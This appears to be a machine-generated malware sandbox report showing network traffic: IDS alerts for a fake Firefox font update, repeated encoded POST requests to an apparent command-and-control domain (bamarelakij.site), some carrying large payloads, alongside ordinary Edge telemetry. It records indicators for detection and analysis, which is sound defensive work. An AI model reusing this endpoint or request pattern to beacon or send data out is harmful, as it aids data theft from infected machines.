Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50093 -> 104.21.80.52:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50089 -> 104.21.80.52:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50097 -> 104.21.80.52:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50091 -> 104.21.80.52:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50096 -> 104.21.80.52:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50095 -> 104.21.80.52:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:50092 -> 104.21.80.52:443
Source: global traffic | HTTP traffic detected:
  POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
  Content-Length: 147
  Host: bamarelakij.site
Source: global traffic | HTTP traffic detected:
  POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
  p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
  Content-Length: 53
  Host: bamarelakij.site
Source: global traffic | HTTP traffic detected:
  POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
  p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
  Content-Length: 208
  Host: bamarelakij.site
Source: global traffic | HTTP traffic detected:
  GET /c.gif?rnd=1736430156624&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=b276648dc0624032bb79063018bd1f87&activityId=b276648dc0624032bb79063018bd1f87&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1
  Host: c.msn.com
  Connection: keep-alive
  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
  sec-ch-ua-mobile: ?0
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
  sec-ch-ua-platform: "Windows"
  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
  Sec-Fetch-Site: same-site
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: image
  Referer: https://ntp.msn.com/
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
  Cookie: _C_ETH=1; USRLOC=; MUID=0E823CD872A76198161729B773BE609A; _EDGE_S=F=1&SID=0C1F4AD11C6365C209785FBE1D6C642F; _EDGE_V=1
Source: global traffic | HTTP traffic detected:
  GET /b?rn=1736430156624&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0E823CD872A76198161729B773BE609A&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
  Host: sb.scorecardresearch.com
  Connection: keep-alive
  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
  sec-ch-ua-mobile: ?0
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
  sec-ch-ua-platform: "Windows"
  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
  Sec-Fetch-Site: cross-site
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: image
  Referer: https://ntp.msn.com/
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic | HTTP traffic detected:
  POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430156622&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
  Host: browser.events.data.msn.com
  Connection: keep-alive
  Content-Length: 3856
  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
  sec-ch-ua-platform: "Windows"
  sec-ch-ua-mobile: ?0
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
  Content-Type: text/plain;charset=UTF-8
  Accept: */*
  Origin: https://ntp.msn.com
  Sec-Fetch-Site: same-site
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: empty
  Referer: https://ntp.msn.com/
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
  Cookie: _C_ETH=1; USRLOC=; MUID=0E823CD872A76198161729B773BE609A; _EDGE_S=F=1&SID=0C1F4AD11C6365C209785FBE1D6C642F; _EDGE_V=1
Source: global traffic | HTTP traffic detected:
  GET /b2?rn=1736430156624&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0E823CD872A76198161729B773BE609A&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
  Host: sb.scorecardresearch.com
  Connection: keep-alive
  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
  sec-ch-ua-mobile: ?0
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
  sec-ch-ua-platform: "Windows"
  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
  Sec-Fetch-Site: cross-site
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: image
  Referer: https://ntp.msn.com/
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
  Cookie: UID=1C82b153708d47b4ae7d1c01736430158; XID=1C82b153708d47b4ae7d1c01736430158
Source: global traffic | HTTP traffic detected:
  GET /c.gif?rnd=1736430156624&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=b276648dc0624032bb79063018bd1f87&activityId=b276648dc0624032bb79063018bd1f87&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=DA9A15B01DA04E12909853D03F33D1E9&MUID=0E823CD872A76198161729B773BE609A HTTP/1.1
  Host: c.msn.com
  Connection: keep-alive
  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
  sec-ch-ua-mobile: ?0
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
  sec-ch-ua-platform: "Windows"
  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
  Sec-Fetch-Site: cross-site
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: image
  Referer: https://ntp.msn.com/
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
  Cookie: USRLOC=; MUID=0E823CD872A76198161729B773BE609A; _EDGE_S=F=1&SID=0C1F4AD11C6365C209785FBE1D6C642F; _EDGE_V=1; SM=T; _C_ETH=1
Source: global traffic | HTTP traffic detected:
POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 147
Host: bamarelakij.site

Source: global traffic | HTTP traffic detected:
POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430158575&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
Host: browser.events.data.msn.com
Connection: keep-alive
Content-Length: 11483
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-platform: "Windows"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://ntp.msn.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Cookie: USRLOC=; MUID=0E823CD872A76198161729B773BE609A; _EDGE_S=F=1&SID=0C1F4AD11C6365C209785FBE1D6C642F; _EDGE_V=1; msnup=

Source: global traffic | HTTP traffic detected:
POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430158586&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
Host: browser.events.data.msn.com
Connection: keep-alive
Content-Length: 33238
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-platform: "Windows"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://ntp.msn.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Cookie: USRLOC=; MUID=0E823CD872A76198161729B773BE609A; _EDGE_S=F=1&SID=0C1F4AD11C6365C209785FBE1D6C642F; _EDGE_V=1; msnup=

Source: global traffic | HTTP traffic detected:
POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430159327&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
Host: browser.events.data.msn.com
Connection: keep-alive
Content-Length: 5379
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-platform: "Windows"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://ntp.msn.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Cookie: USRLOC=; MUID=0E823CD872A76198161729B773BE609A; _EDGE_S=F=1&SID=0C1F4AD11C6365C209785FBE1D6C642F; _EDGE_V=1; msnup=; _C_ETH=1

Source: global traffic | HTTP traffic detected:
POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
Content-Length: 53
Host: bamarelakij.site

Source: global traffic | HTTP traffic detected:
POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430159570&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
Host: browser.events.data.msn.com
Connection: keep-alive
Content-Length: 9880
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-platform: "Windows"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://ntp.msn.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Cookie: USRLOC=; MUID=0E823CD872A76198161729B773BE609A; _EDGE_S=F=1&SID=0C1F4AD11C6365C209785FBE1D6C642F; _EDGE_V=1; msnup=; _C_ETH=1

Source: global traffic | HTTP traffic detected:
GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
Host: clients2.googleusercontent.com
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic | HTTP traffic detected:
POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
Content-Length: 130028
Host: bamarelakij.site

Source: global traffic | HTTP traffic detected:
POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
Content-Length: 745
Host: bamarelakij.site

Source: global traffic | HTTP traffic detected:
POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
Content-Length: 212
Host: bamarelakij.site

Source: global traffic | HTTP traffic detected:
POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
Content-Length: 380
Host: bamarelakij.site

Source: global traffic | HTTP traffic detected:
POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
Content-Length: 9953
Host: bamarelakij.site

Source: global traffic | HTTP traffic detected:
POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
Content-Length: 70050
Host: bamarelakij.site

Source: global traffic | HTTP traffic detected:
POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
Content-Length: 35
Host: bamarelakij.site

Source: global traffic | HTTP traffic detected:
POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
Content-Length: 132728
Host: bamarelakij.site

Source: global traffic | HTTP traffic detected:
POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
Content-Length: 745
Host: bamarelakij.site

Source: global traffic | HTTP traffic detected:
POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
Content-Length: 212
Host: bamarelakij.site

Source: global traffic | HTTP traffic detected:
POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
Content-Length: 380
Host: bamarelakij.site

Source: global traffic | HTTP traffic detected:
POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
Content-Length: 9953
Host: bamarelakij.site

Source: global traffic | HTTP traffic detected:
POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
Content-Length: 70017
Host: bamarelakij.site

Source: global traffic | HTTP traffic detected:
POST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
p: 1V/P0mPQQSCTS08rUK676SzNB/ZpQ2o6hGfMU4k1Y8Y86gb2rF0ak7cf4BYAW0D4A9tKmQjRguuH
Content-Length: 35
Host: bamarelakij.site
Source: C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe | Code function: 2_2_6D463DAF HttpQueryInfoW,HttpQueryInfoW,HttpQueryInfoW,GetLastError,_memmove,_memmove,InternetReadFile, 2_2_6D463DAF

Source: global traffic | HTTP traffic detected:
GET /c.gif?rnd=1736430156624&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=b276648dc0624032bb79063018bd1f87&activityId=b276648dc0624032bb79063018bd1f87&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1
Host: c.msn.com
Connection: keep-alive
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
sec-ch-ua-platform: "Windows"
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Cookie: _C_ETH=1; USRLOC=; MUID=0E823CD872A76198161729B773BE609A; _EDGE_S=F=1&SID=0C1F4AD11C6365C209785FBE1D6C642F; _EDGE_V=1
Source: RescueCDBurner.exe, 00000004.00000002.1576336443.000000006D789000.00000002.00000001.01000000.00000013.sdmp | String found in binary or memory: [long embedded string block containing certificate names and serial numbers, omitted] equals www.yahoo.com (Yahoo)
Source: RescueCDBurner.exe, 00000003.00000002.1514336862.000000006C859000.00000002.00000001.01000000.0000000A.sdmp | String found in binary or memory: [long embedded string block containing certificate names and serial numbers, omitted] equals www.yahoo.com (Yahoo)
